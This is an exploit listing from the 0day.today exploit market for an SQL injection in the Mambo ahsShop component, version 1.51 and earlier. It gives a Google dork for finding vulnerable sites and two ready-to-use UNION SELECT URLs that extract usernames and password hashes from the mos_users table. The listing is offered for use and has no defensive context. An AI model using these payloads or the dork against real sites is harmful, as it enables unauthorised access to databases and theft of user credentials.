[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Mambo Component ahsShop <= 1.51 (vara) SQL Injection Vulnerability

Author
S@BUN
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2795
Category
web applications
Date add
31-03-2008
Platform
unsorted
==================================================================
Mambo Component ahsShop <= 1.51 (vara) SQL Injection Vulnerability
==================================================================



##########################################
#
# Mambo Component com_ahsshop SQL Injection
#
###########################################
#
# DORK 1 : allinurl: "com_ahsshop"do=default
#
###########################################
EXPLOiT 1 :

index.php?option=com_ahsshop&do=default&vara=-99999/**/union/**/select/**/0,concat(username,0x3a,password),0x3a,3,4,0x3a,6,0x3a/**/from/**/mos_users/*

EXPLOiT 2 :

index.php?option=com_ahsshop&do=default&vara=-99999/**/union/**/select/**/concat(username,0x3a,password),1/**/from/**/mos_users/*


###########################################



#  0day.today [2024-12-23]  #